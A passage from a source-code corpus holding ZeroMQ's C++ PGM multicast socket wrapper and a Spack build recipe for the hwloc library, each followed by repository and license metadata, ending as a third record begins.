#include "err.hpp"
#include "random.hpp"
#include "stdint.hpp"
#ifndef MSG_ERRQUEUE
#define MSG_ERRQUEUE 0x2000
#endif
//  Construct an unopened PGM socket wrapper. The underlying OpenPGM socket
//  is created later in init (); until then 'sock' stays NULL and the
//  receive-side bookkeeping counters are zeroed.
zmq::pgm_socket_t::pgm_socket_t (bool receiver_, const options_t &options_) :
    sock (NULL),
    options (options_),
    receiver (receiver_),
    pgm_msgv (NULL),
    pgm_msgv_len (0),
    nbytes_rec (0),
    nbytes_processed (0),
    pgm_msgv_processed (0)
{
}
//  Resolve PGM socket address.
//  network_ of the form <interface & multicast group decls>:<IP port>
//  e.g. eth0;239.192.0.1:7500
//       link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000
//       ;[fe80::1%en0]:7500
//  On success writes the resolved address list to *res (caller frees with
//  pgm_freeaddrinfo) and the port to *port_number, returning 0.
//  On failure returns -1 with errno set to EINVAL.
int zmq::pgm_socket_t::init_address (const char *network_,
    struct pgm_addrinfo_t **res, uint16_t *port_number)
{
    //  Parse port number, start from end for IPv6
    const char *port_delim = strrchr (network_, ':');
    if (!port_delim) {
        errno = EINVAL;
        return -1;
    }

    *port_number = atoi (port_delim + 1);

    //  Copy the interface/group part into a bounded local buffer,
    //  rejecting inputs that would not fit (leaving room for the NUL).
    char network [256];
    if (port_delim - network_ >= (int) sizeof (network) - 1) {
        errno = EINVAL;
        return -1;
    }
    memset (network, '\0', sizeof (network));
    memcpy (network, network_, port_delim - network_);

    pgm_error_t *pgm_error = NULL;
    struct pgm_addrinfo_t hints;

    memset (&hints, 0, sizeof (hints));
    hints.ai_family = AF_UNSPEC;
    if (!pgm_getaddrinfo (network, NULL, res, &pgm_error)) {

        //  Invalid parameters don't set pgm_error_t.
        zmq_assert (pgm_error != NULL);
        //  Classify the failure: configuration/transient errors are
        //  reported to the caller, anything else is a fatal OpenPGM bug.
        if (pgm_error->domain == PGM_ERROR_DOMAIN_IF &&

              //  NB: cannot catch EAI_BADFLAGS.
              ( pgm_error->code != PGM_ERROR_SERVICE &&
                pgm_error->code != PGM_ERROR_SOCKTNOSUPPORT)) {

            //  User, host, or network configuration or transient error.
            pgm_error_free (pgm_error);
            errno = EINVAL;
            return -1;
        }

        //  Fatal OpenPGM internal error.
        zmq_assert (false);
    }
    return 0;
}
//  Create, bind and connect PGM socket.
//  Resolves network_, creates an IP/PGM or UDP-encapsulated PGM socket,
//  applies buffer/window/timer options, binds, joins the multicast
//  groups and connects. For a receiver socket it also preallocates the
//  pgm_msgv scatter array used by receive ().
//  Returns 0 on success; on any failure jumps to err_abort, which
//  releases whatever was partially created and returns -1 with errno
//  set to EINVAL.
int zmq::pgm_socket_t::init (bool udp_encapsulation_, const char *network_)
{
    //  Can not open transport before destroying old one.
    zmq_assert (sock == NULL);
    zmq_assert (options.rate > 0);

    //  Zero counter used in msgrecv.
    nbytes_rec = 0;
    nbytes_processed = 0;
    pgm_msgv_processed = 0;

    uint16_t port_number;
    struct pgm_addrinfo_t *res = NULL;
    sa_family_t sa_family;

    pgm_error_t *pgm_error = NULL;

    if (init_address(network_, &res, &port_number) < 0) {
        goto err_abort;
    }

    zmq_assert (res != NULL);

    //  Pick up detected IP family.
    sa_family = res->ai_send_addrs[0].gsr_group.ss_family;

    //  Create IP/PGM or UDP/PGM socket.
    if (udp_encapsulation_) {
        if (!pgm_socket (&sock, sa_family, SOCK_SEQPACKET, IPPROTO_UDP,
              &pgm_error)) {

            //  Invalid parameters don't set pgm_error_t.
            zmq_assert (pgm_error != NULL);
            if (pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET && (
                  pgm_error->code != PGM_ERROR_BADF &&
                  pgm_error->code != PGM_ERROR_FAULT &&
                  pgm_error->code != PGM_ERROR_NOPROTOOPT &&
                  pgm_error->code != PGM_ERROR_FAILED))

                //  User, host, or network configuration or transient error.
                goto err_abort;

            //  Fatal OpenPGM internal error.
            zmq_assert (false);
        }

        //  All options are of data type int
        const int encapsulation_port = port_number;
        //  UDP encapsulation sends PGM payloads over UDP unicast/multicast
        //  on the parsed port.
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_UDP_ENCAP_UCAST_PORT,
                &encapsulation_port, sizeof (encapsulation_port)))
            goto err_abort;
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_UDP_ENCAP_MCAST_PORT,
                &encapsulation_port, sizeof (encapsulation_port)))
            goto err_abort;
    }
    else {
        if (!pgm_socket (&sock, sa_family, SOCK_SEQPACKET, IPPROTO_PGM,
              &pgm_error)) {

            //  Invalid parameters don't set pgm_error_t.
            zmq_assert (pgm_error != NULL);
            if (pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET && (
                  pgm_error->code != PGM_ERROR_BADF &&
                  pgm_error->code != PGM_ERROR_FAULT &&
                  pgm_error->code != PGM_ERROR_NOPROTOOPT &&
                  pgm_error->code != PGM_ERROR_FAILED))

                //  User, host, or network configuration or transient error.
                goto err_abort;

            //  Fatal OpenPGM internal error.
            zmq_assert (false);
        }
    }

    {
        //  Apply kernel socket buffer sizes when configured (0 = default).
        const int rcvbuf = (int) options.rcvbuf;
        if (rcvbuf) {
            if (!pgm_setsockopt (sock, SOL_SOCKET, SO_RCVBUF, &rcvbuf,
                  sizeof (rcvbuf)))
                goto err_abort;
        }

        const int sndbuf = (int) options.sndbuf;
        if (sndbuf) {
            if (!pgm_setsockopt (sock, SOL_SOCKET, SO_SNDBUF, &sndbuf,
                  sizeof (sndbuf)))
                goto err_abort;
        }

        const int max_tpdu = (int) pgm_max_tpdu;
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MTU, &max_tpdu,
              sizeof (max_tpdu)))
            goto err_abort;
    }

    if (receiver) {
        //  Receiver-side reliability parameters: receive-window size,
        //  peer/SPM-request expiries and NAK back-off/repeat timers.
        const int recv_only        = 1,
                  rxw_max_tpdu     = (int) pgm_max_tpdu,
                  rxw_sqns         = compute_sqns (rxw_max_tpdu),
                  peer_expiry      = pgm_secs (300),
                  spmr_expiry      = pgm_msecs (25),
                  nak_bo_ivl       = pgm_msecs (50),
                  nak_rpt_ivl      = pgm_msecs (200),
                  nak_rdata_ivl    = pgm_msecs (200),
                  nak_data_retries = 50,
                  nak_ncf_retries  = 50;

        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_RECV_ONLY, &recv_only,
              sizeof (recv_only)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_RXW_SQNS, &rxw_sqns,
              sizeof (rxw_sqns)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_PEER_EXPIRY, &peer_expiry,
              sizeof (peer_expiry)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_SPMR_EXPIRY, &spmr_expiry,
              sizeof (spmr_expiry)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_BO_IVL, &nak_bo_ivl,
              sizeof (nak_bo_ivl)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_RPT_IVL, &nak_rpt_ivl,
              sizeof (nak_rpt_ivl)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_RDATA_IVL,
              &nak_rdata_ivl, sizeof (nak_rdata_ivl)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_DATA_RETRIES,
              &nak_data_retries, sizeof (nak_data_retries)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_NAK_NCF_RETRIES,
              &nak_ncf_retries, sizeof (nak_ncf_retries)))
            goto err_abort;
    }
    else {
        //  Sender-side parameters: rate limit (converted from kbit/s to
        //  B/s), transmit-window size, and the ambient/decaying heartbeat
        //  SPM schedule.
        const int send_only        = 1,
                  max_rte          = (int) ((options.rate * 1000) / 8),
                  txw_max_tpdu     = (int) pgm_max_tpdu,
                  txw_sqns         = compute_sqns (txw_max_tpdu),
                  ambient_spm      = pgm_secs (30),
                  heartbeat_spm[]  = { pgm_msecs (100),
                                       pgm_msecs (100),
                                       pgm_msecs (100),
                                       pgm_msecs (100),
                                       pgm_msecs (1300),
                                       pgm_secs  (7),
                                       pgm_secs  (16),
                                       pgm_secs  (25),
                                       pgm_secs  (30) };

        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_SEND_ONLY,
              &send_only, sizeof (send_only)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_ODATA_MAX_RTE,
              &max_rte, sizeof (max_rte)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_TXW_SQNS,
              &txw_sqns, sizeof (txw_sqns)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_AMBIENT_SPM,
              &ambient_spm, sizeof (ambient_spm)) ||
            !pgm_setsockopt (sock, IPPROTO_PGM, PGM_HEARTBEAT_SPM,
              &heartbeat_spm, sizeof (heartbeat_spm)))
            goto err_abort;
    }

    //  PGM transport GSI.
    struct pgm_sockaddr_t addr;

    memset (&addr, 0, sizeof(addr));
    addr.sa_port = port_number;
    addr.sa_addr.sport = DEFAULT_DATA_SOURCE_PORT;

    //  Create random GSI.
    uint32_t buf [2];
    buf [0] = generate_random ();
    buf [1] = generate_random ();
    if (!pgm_gsi_create_from_data (&addr.sa_addr.gsi, (uint8_t*) buf, 8))
        goto err_abort;


    //  Bind a transport to the specified network devices.
    struct pgm_interface_req_t if_req;
    memset (&if_req, 0, sizeof(if_req));
    if_req.ir_interface = res->ai_recv_addrs[0].gsr_interface;
    if_req.ir_scope_id  = 0;
    if (AF_INET6 == sa_family) {
        //  IPv6 needs the link-local scope id carried over from the
        //  resolved group address.
        struct sockaddr_in6 sa6;
        memcpy (&sa6, &res->ai_recv_addrs[0].gsr_group, sizeof (sa6));
        if_req.ir_scope_id = sa6.sin6_scope_id;
    }
    if (!pgm_bind3 (sock, &addr, sizeof (addr), &if_req, sizeof (if_req),
          &if_req, sizeof (if_req), &pgm_error)) {

        //  Invalid parameters don't set pgm_error_t.
        zmq_assert (pgm_error != NULL);
        if ((pgm_error->domain == PGM_ERROR_DOMAIN_SOCKET ||
             pgm_error->domain == PGM_ERROR_DOMAIN_IF) && (
             pgm_error->code != PGM_ERROR_INVAL &&
             pgm_error->code != PGM_ERROR_BADF &&
             pgm_error->code != PGM_ERROR_FAULT))

            //  User, host, or network configuration or transient error.
            goto err_abort;

        //  Fatal OpenPGM internal error.
        zmq_assert (false);
    }

    //  Join IP multicast groups.
    for (unsigned i = 0; i < res->ai_recv_addrs_len; i++) {
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_JOIN_GROUP,
              &res->ai_recv_addrs [i], sizeof (struct group_req)))
            goto err_abort;
    }
    if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_SEND_GROUP,
          &res->ai_send_addrs [0], sizeof (struct group_req)))
        goto err_abort;

    pgm_freeaddrinfo (res);
    res = NULL;

    //  Set IP level parameters.
    {
        //  Multicast loopback disabled by default
        const int multicast_loop = 0;
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MULTICAST_LOOP,
              &multicast_loop, sizeof (multicast_loop)))
            goto err_abort;

        const int multicast_hops = options.multicast_hops;
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_MULTICAST_HOPS,
              &multicast_hops, sizeof (multicast_hops)))
            goto err_abort;

        //  Expedited Forwarding PHB for network elements, no ECN.
        //  Ignore return value due to varied runtime support.
        const int dscp = 0x2e << 2;
        if (AF_INET6 != sa_family)
            pgm_setsockopt (sock, IPPROTO_PGM, PGM_TOS,
                &dscp, sizeof (dscp));

        const int nonblocking = 1;
        if (!pgm_setsockopt (sock, IPPROTO_PGM, PGM_NOBLOCK,
              &nonblocking, sizeof (nonblocking)))
            goto err_abort;
    }

    //  Connect PGM transport to start state machine.
    if (!pgm_connect (sock, &pgm_error)) {

        //  Invalid parameters don't set pgm_error_t.
        zmq_assert (pgm_error != NULL);
        goto err_abort;
    }

    //  For receiver transport preallocate pgm_msgv array.
    //  Size it so the whole inbound batch fits, rounding up.
    if (receiver) {
        zmq_assert (in_batch_size > 0);
        size_t max_tsdu_size = get_max_tsdu_size ();
        pgm_msgv_len = (int) in_batch_size / max_tsdu_size;
        if ((int) in_batch_size % max_tsdu_size)
            pgm_msgv_len++;
        zmq_assert (pgm_msgv_len);

        pgm_msgv = (pgm_msgv_t*) malloc (sizeof (pgm_msgv_t) * pgm_msgv_len);
        alloc_assert (pgm_msgv);
    }

    return 0;

err_abort:
    if (sock != NULL) {
        pgm_close (sock, FALSE);
        sock = NULL;
    }
    if (res != NULL) {
        pgm_freeaddrinfo (res);
        res = NULL;
    }
    if (pgm_error != NULL) {
        pgm_error_free (pgm_error);
        pgm_error = NULL;
    }
    errno = EINVAL;
    return -1;
}
//  Release the receive scatter array and close the underlying OpenPGM
//  socket (TRUE = flush pending data) if they were ever created.
zmq::pgm_socket_t::~pgm_socket_t ()
{
    if (pgm_msgv != NULL)
        free (pgm_msgv);
    if (sock != NULL)
        pgm_close (sock, TRUE);
}
//  Get receiver fds. receive_fd_ is signaled for incoming packets,
//  waiting_pipe_fd_ is signaled for state driven events and data.
void zmq::pgm_socket_t::get_receiver_fds (fd_t *receive_fd_,
    fd_t *waiting_pipe_fd_)
{
    zmq_assert (receive_fd_);
    zmq_assert (waiting_pipe_fd_);

    //  Descriptor raised on incoming ODATA/RDATA packets.
    socklen_t optlen = sizeof (*receive_fd_);
    bool ok = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RECV_SOCK, receive_fd_,
        &optlen);
    zmq_assert (ok);
    zmq_assert (optlen == sizeof (*receive_fd_));

    //  Descriptor raised on pending state-machine events.
    optlen = sizeof (*waiting_pipe_fd_);
    ok = pgm_getsockopt (sock, IPPROTO_PGM, PGM_PENDING_SOCK,
        waiting_pipe_fd_, &optlen);
    zmq_assert (ok);
    zmq_assert (optlen == sizeof (*waiting_pipe_fd_));
}
//  Get fds and store them into user allocated memory.
//  send_fd is for non-blocking send wire notifications.
//  receive_fd_ is for incoming back-channel protocol packets.
//  rdata_notify_fd_ is raised for waiting repair transmissions.
//  pending_notify_fd_ is for state driven events.
void zmq::pgm_socket_t::get_sender_fds (fd_t *send_fd_, fd_t *receive_fd_,
    fd_t *rdata_notify_fd_, fd_t *pending_notify_fd_)
{
    socklen_t socklen;
    bool rc;

    zmq_assert (send_fd_);
    zmq_assert (receive_fd_);
    zmq_assert (rdata_notify_fd_);
    zmq_assert (pending_notify_fd_);

    socklen = sizeof (*send_fd_);
    rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_SEND_SOCK, send_fd_, &socklen);
    zmq_assert (rc);
    //  BUGFIX: was comparing against sizeof (*receive_fd_) — a copy-paste
    //  slip; the size returned for PGM_SEND_SOCK must match send_fd_.
    zmq_assert (socklen == sizeof (*send_fd_));

    socklen = sizeof (*receive_fd_);
    rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RECV_SOCK, receive_fd_,
        &socklen);
    zmq_assert (rc);
    zmq_assert (socklen == sizeof (*receive_fd_));

    socklen = sizeof (*rdata_notify_fd_);
    rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_REPAIR_SOCK, rdata_notify_fd_,
        &socklen);
    zmq_assert (rc);
    zmq_assert (socklen == sizeof (*rdata_notify_fd_));

    socklen = sizeof (*pending_notify_fd_);
    rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_PENDING_SOCK,
        pending_notify_fd_, &socklen);
    zmq_assert (rc);
    zmq_assert (socklen == sizeof (*pending_notify_fd_));
}
//  Send one APDU, transmit window owned memory.
//  data_len_ must be less than one TPDU.
//  Returns the number of bytes written (all of data_len_ or none); on a
//  zero-byte result errno distinguishes rate limiting (ENOMEM) from a
//  would-block condition (EBUSY).
size_t zmq::pgm_socket_t::send (unsigned char *data_, size_t data_len_)
{
    size_t written = 0;

    const int io_status = pgm_send (sock, data_, data_len_, &written);

    //  We have to write all data as one packet.
    if (written == 0) {
        zmq_assert (io_status == PGM_IO_STATUS_RATE_LIMITED ||
            io_status == PGM_IO_STATUS_WOULD_BLOCK);
        errno = io_status == PGM_IO_STATUS_RATE_LIMITED ? ENOMEM : EBUSY;
    }
    else {
        zmq_assert (io_status == PGM_IO_STATUS_NORMAL);
        zmq_assert (written == data_len_);
    }

    //  Save return value.
    last_tx_status = io_status;

    return written;
}
long zmq::pgm_socket_t::get_rx_timeout ()
{
if (last_rx_status != PGM_IO_STATUS_RATE_LIMITED &&
last_rx_status != PGM_IO_STATUS_TIMER_PENDING)
return -1;
struct timeval tv;
socklen_t optlen = sizeof (tv);
const bool rc = pgm_getsockopt (sock, IPPROTO_PGM,
last_rx_status == PGM_IO_STATUS_RATE_LIMITED ? PGM_RATE_REMAIN :
PGM_TIME_REMAIN, &tv, &optlen);
zmq_assert (rc);
const long timeout = (tv.tv_sec * 1000) + (tv.tv_usec / 1000);
return timeout;
}
long zmq::pgm_socket_t::get_tx_timeout ()
{
if (last_tx_status != PGM_IO_STATUS_RATE_LIMITED)
return -1;
struct timeval tv;
socklen_t optlen = sizeof (tv);
const bool rc = pgm_getsockopt (sock, IPPROTO_PGM, PGM_RATE_REMAIN, &tv,
&optlen);
zmq_assert (rc);
const long timeout = (tv.tv_sec * 1000) + (tv.tv_usec / 1000);
return timeout;
}
//  Return max TSDU size without fragmentation from current PGM transport.
size_t zmq::pgm_socket_t::get_max_tsdu_size ()
{
    int mss = 0;
    socklen_t optlen = sizeof (mss);

    const bool ok = pgm_getsockopt (sock, IPPROTO_PGM, PGM_MSS, &mss,
        &optlen);
    zmq_assert (ok);
    zmq_assert (optlen == sizeof (mss));

    return (size_t) mss;
}
//  pgm_recvmsgv is called to fill the pgm_msgv array up to pgm_msgv_len.
//  In subsequent calls data from pgm_msgv structure are returned.
//  Returns the APDU length with *raw_data_/*tsi_ set on success, 0 with
//  errno EAGAIN/EBUSY/ENOMEM when nothing is deliverable right now, and
//  -1 with errno EINVAL on data loss (with *tsi_ set to the lossy peer).
ssize_t zmq::pgm_socket_t::receive (void **raw_data_, const pgm_tsi_t **tsi_)
{
    size_t raw_data_len = 0;

    //  We just sent all data from pgm_transport_recvmsgv up
    //  and have to return 0 so that another engine in this thread is
    //  scheduled.
    if (nbytes_rec == nbytes_processed && nbytes_rec > 0) {

        //  Reset all the counters.
        nbytes_rec = 0;
        nbytes_processed = 0;
        pgm_msgv_processed = 0;
        errno = EAGAIN;
        return 0;
    }

    //  If we are going in for the first time, or if we have processed all
    //  pgm_msgv_t structures previously read from the pgm socket.
    if (nbytes_rec == nbytes_processed) {

        //  Check program flow.
        zmq_assert (pgm_msgv_processed == 0);
        zmq_assert (nbytes_processed == 0);
        zmq_assert (nbytes_rec == 0);

        //  Receive a vector of Application Protocol Domain Unit's (APDUs)
        //  from the transport.
        pgm_error_t *pgm_error = NULL;

        const int status = pgm_recvmsgv (sock, pgm_msgv,
            pgm_msgv_len, MSG_ERRQUEUE, &nbytes_rec, &pgm_error);

        //  Invalid parameters.
        zmq_assert (status != PGM_IO_STATUS_ERROR);

        last_rx_status = status;

        //  In a case when no ODATA/RDATA fired POLLIN event (SPM...)
        //  pgm_recvmsg returns PGM_IO_STATUS_TIMER_PENDING.
        if (status == PGM_IO_STATUS_TIMER_PENDING) {

            zmq_assert (nbytes_rec == 0);

            //  In case if no RDATA/ODATA caused POLLIN 0 is
            //  returned.
            nbytes_rec = 0;
            errno = EBUSY;
            return 0;
        }

        //  Send SPMR, NAK, ACK is rate limited.
        if (status == PGM_IO_STATUS_RATE_LIMITED) {

            zmq_assert (nbytes_rec == 0);

            //  In case if no RDATA/ODATA caused POLLIN 0 is returned.
            nbytes_rec = 0;
            errno = ENOMEM;
            return 0;
        }

        //  No peers and hence no incoming packets.
        if (status == PGM_IO_STATUS_WOULD_BLOCK) {

            zmq_assert (nbytes_rec == 0);

            //  In case if no RDATA/ODATA caused POLLIN 0 is returned.
            nbytes_rec = 0;
            errno = EAGAIN;
            return 0;
        }

        //  Data loss.
        if (status == PGM_IO_STATUS_RESET) {

            struct pgm_sk_buff_t* skb = pgm_msgv [0].msgv_skb [0];

            //  Save lost data TSI.
            *tsi_ = &skb->tsi;
            nbytes_rec = 0;

            //  In case of data loss -1 is returned.
            errno = EINVAL;
            pgm_free_skb (skb);
            return -1;
        }

        zmq_assert (status == PGM_IO_STATUS_NORMAL);
    }
    else
    {
        zmq_assert (pgm_msgv_processed <= pgm_msgv_len);
    }

    //  Zero byte payloads are valid in PGM, but not 0MQ protocol.
    zmq_assert (nbytes_rec > 0);

    // Only one APDU per pgm_msgv_t structure is allowed.
    zmq_assert (pgm_msgv [pgm_msgv_processed].msgv_len == 1);

    struct pgm_sk_buff_t* skb =
        pgm_msgv [pgm_msgv_processed].msgv_skb [0];

    //  Take pointers from pgm_msgv_t structure.
    *raw_data_ = skb->data;
    raw_data_len = skb->len;

    //  Save current TSI.
    *tsi_ = &skb->tsi;

    //  Move to the next pgm_msgv_t structure.
    pgm_msgv_processed++;
    zmq_assert (pgm_msgv_processed <= pgm_msgv_len);
    nbytes_processed +=raw_data_len;

    return raw_data_len;
}
//  Drive the PGM state machine (SPMR/NAK/ACK traffic) without expecting
//  any payload; maps the resulting status onto errno for the caller.
void zmq::pgm_socket_t::process_upstream ()
{
    pgm_msgv_t dummy_msg;
    size_t dummy_bytes = 0;
    pgm_error_t *pgm_error = NULL;

    const int status = pgm_recvmsgv (sock, &dummy_msg, 1, MSG_ERRQUEUE,
        &dummy_bytes, &pgm_error);

    //  Invalid parameters.
    zmq_assert (status != PGM_IO_STATUS_ERROR);

    //  No data should be returned.
    zmq_assert (dummy_bytes == 0 && (status == PGM_IO_STATUS_TIMER_PENDING ||
        status == PGM_IO_STATUS_RATE_LIMITED ||
        status == PGM_IO_STATUS_WOULD_BLOCK));

    last_rx_status = status;

    switch (status) {
        case PGM_IO_STATUS_TIMER_PENDING:
            errno = EBUSY;
            break;
        case PGM_IO_STATUS_RATE_LIMITED:
            errno = ENOMEM;
            break;
        default:
            errno = EAGAIN;
            break;
    }
}
//  Compute the PGM window size in sequence numbers for the configured
//  rate (kbit/s) and recovery interval (ms), never returning less than
//  one packet.
int zmq::pgm_socket_t::compute_sqns (int tpdu_)
{
    //  Rate is kbit/s, so dividing by 8 yields bytes per millisecond.
    const uint64_t bytes_per_ms = uint64_t (options.rate) / 8;

    //  Total buffer size in bytes over the recovery interval.
    const uint64_t buffer_bytes = uint64_t (options.recovery_ivl) * bytes_per_ms;

    //  Translate bytes into whole packets of tpdu_ bytes each.
    const uint64_t sqns = buffer_bytes / tpdu_;

    return sqns > 0 ? (int) sqns : 1;
}
#endif
|
C++
|
Apache-2.0
|
EshaMaharishi/pubsub-1/src/third_party/zeromq-4.0.4/src/pgm_socket.cpp
|
db0400b3-b28f-4790-b84b-b8417024642e
|
[{"tag": "IP_ADDRESS", "value": "224.250.0.1", "start": 1588, "end": 1599, "context": "/ e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%e"}, {"tag": "IP_ADDRESS", "value": "224.250.0.2", "start": 1600, "end": 1611, "context": ";239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint"}, {"tag": "IP_ADDRESS", "value": "224.250.0.3:8000", "start": 1612, "end": 1628, "context": ":7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint zmq::pgm_socket_"}, {"tag": "IP_ADDRESS", "value": "239.192.0.1:7500", "start": 1551, "end": 1567, "context": " & multicast group decls>:<IP port>\n// e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.2"}]
|
[{"tag": "IP_ADDRESS", "value": "224.250.0.1", "start": 1588, "end": 1599, "context": "/ e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%e"}, {"tag": "IP_ADDRESS", "value": "224.250.0.2", "start": 1600, "end": 1611, "context": ";239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint"}, {"tag": "IP_ADDRESS", "value": "224.250.0.3:8000", "start": 1612, "end": 1628, "context": ":7500\n// link-local;224.250.0.1,224.250.0.2;224.250.0.3:8000\n// ;[fe80::1%en0]:7500\nint zmq::pgm_socket_"}, {"tag": "IP_ADDRESS", "value": "239.192.0.1:7500", "start": 1551, "end": 1567, "context": " & multicast group decls>:<IP port>\n// e.g. eth0;239.192.0.1:7500\n// link-local;224.250.0.1,224.250.0.2;224.2"}]
|
# Copyright 2013-2019 Lawrence Livermore National Security, LLC and other
# Spack Project Developers. See the top-level COPYRIGHT file for details.
#
# SPDX-License-Identifier: (Apache-2.0 OR MIT)
import sys
class Hwloc(AutotoolsPackage):
    """The Hardware Locality (hwloc) software project.

    The Portable Hardware Locality (hwloc) software package
    provides a portable abstraction (across OS, versions,
    architectures, ...) of the hierarchical topology of modern
    architectures, including NUMA memory nodes, sockets, shared
    caches, cores and simultaneous multithreading. It also gathers
    various system attributes such as cache and memory information
    as well as the locality of I/O devices such as network
    interfaces, InfiniBand HCAs or GPUs. It primarily aims at
    helping applications with gathering information about modern
    computing hardware so as to exploit it accordingly and
    efficiently.
    """

    homepage = "http://www.open-mpi.org/projects/hwloc/"
    url = "https://download.open-mpi.org/release/hwloc/v2.0/hwloc-2.0.2.tar.gz"
    list_url = "http://www.open-mpi.org/software/hwloc/"
    # Release tarballs are grouped in per-minor-version subdirectories,
    # so Spack must crawl two levels deep when listing versions.
    list_depth = 2
    git = 'https://github.com/open-mpi/hwloc.git'

    version('master', branch='master')
    version('2.0.2', sha256='27dcfe42e3fb3422b72ce48b48bf601c0a3e46e850ee72d9bdd17b5863b6e42c')
    version('2.0.1', sha256='f1156df22fc2365a31a3dc5f752c53aad49e34a5e22d75ed231cd97eaa437f9d')
    version('2.0.0', sha256='a0d425a0fc7c7e3f2c92a272ffaffbd913005556b4443e1887d2e1718d902887')
    version('1.11.11', sha256='74329da3be1b25de8e98a712adb28b14e561889244bf3a8138afe91ab18e0b3a')
    version('1.11.10', sha256='0a2530b739d9ebf60c4c1e86adb5451a20d9e78f7798cf78d0147cc6df328aac')
    version('1.11.9', sha256='85b978995b67db0b1a12dd1a73b09ef3d39f8e3cb09f8b9c60cf04633acce46c')
    version('1.11.8', sha256='8af89b1164a330e36d18210360ea9bb305e19f9773d1c882855d261a13054ea8')
    version('1.11.7', sha256='ac16bed9cdd3c63bca1fe1ac3de522a1376b1487c4fc85b7b19592e28fd98e26')
    version('1.11.6', sha256='67963f15197e6b551539c4ed95a4f8882be9a16cf336300902004361cf89bdee')
    version('1.11.5', sha256='da2c780fce9b5440a1a7d1caf78f637feff9181a9d1ca090278cae4bea71b3df')
    version('1.11.4', sha256='1b6a58049c31ce36aff162cf4332998fd468486bd08fdfe0249a47437311512d')
    version('1.11.3', sha256='03a1cc63f23fed7e17e4d4369a75dc77d5c145111b8578b70e0964a12712dea0')
    version('1.11.2', sha256='d11f091ed54c56c325ffca1083113a405fcd8a25d5888af64f5cd6cf587b7b0a')
    version('1.11.1', sha256='b41f877d79b6026640943d57ef25311299378450f2995d507a5e633da711be61')
    version('1.9', sha256='9fb572daef35a1c8608d1a6232a4a9f56846bab2854c50562dfb9a7be294f4e8')

    variant('nvml', default=False, description="Support NVML device discovery")
    variant('gl', default=False, description="Support GL device discovery")
    variant('cuda', default=False, description="Support CUDA devices")
    variant('libxml2', default=True, description="Build with libxml2")
    # PCI discovery is on by default everywhere except macOS (darwin),
    # where libpciaccess is not applicable.
    variant('pci', default=(sys.platform != 'darwin'),
            description="Support analyzing devices on PCI bus")
    variant('shared', default=True, description="Build shared libraries")
    variant(
        'cairo',
        default=False,
        description='Enable the Cairo back-end of hwloc\'s lstopo command'
    )

    depends_on('pkgconfig', type='build')
    # A git checkout of master has no pre-generated configure script, so
    # the full autotools chain is needed only for @master builds.
    depends_on('m4', type='build', when='@master')
    depends_on('autoconf', type='build', when='@master')
    depends_on('automake', type='build', when='@master')
    depends_on('libtool', type='build', when='@master')
    depends_on('cuda', when='+nvml')
    depends_on('cuda', when='+cuda')
    depends_on('gl', when='+gl')
    depends_on('libpciaccess', when='+pci')
    depends_on('libxml2', when='+libxml2')
    depends_on('cairo', when='+cairo')
    # The 1.x series on Linux links against numactl; 2.x does not.
    depends_on('numactl', when='@:1.11.11 platform=linux')

    def url_for_version(self, version):
        # Download URLs embed the major.minor directory plus the full
        # version in the tarball name.
        return "http://www.open-mpi.org/software/hwloc/v%s/downloads/hwloc-%s.tar.gz" % (version.up_to(2), version)

    def configure_args(self):
        # Translate the package variants into ./configure flags.
        args = [
            # Disable OpenCL, since hwloc might pick up an OpenCL
            # library at build time that is then not found at run time
            # (Alternatively, we could require OpenCL as dependency.)
            "--disable-opencl",
        ]
        # netloc only exists in the 2.x series.
        if '@2.0.0:' in self.spec:
            args.append('--enable-netloc')

        args.extend(self.enable_or_disable('cairo'))
        args.extend(self.enable_or_disable('nvml'))
        args.extend(self.enable_or_disable('gl'))
        args.extend(self.enable_or_disable('cuda'))
        args.extend(self.enable_or_disable('libxml2'))
        args.extend(self.enable_or_disable('pci'))
        args.extend(self.enable_or_disable('shared'))

        return args
|
Python
|
ECL-2.0
|
CSCfi/spack/var/spack/repos/builtin/packages/hwloc/package.py
|
ef124adb-9324-41ae-add0-9c1eb5453f27
|
[]
|
[]
|
/*
Cisco Intersight
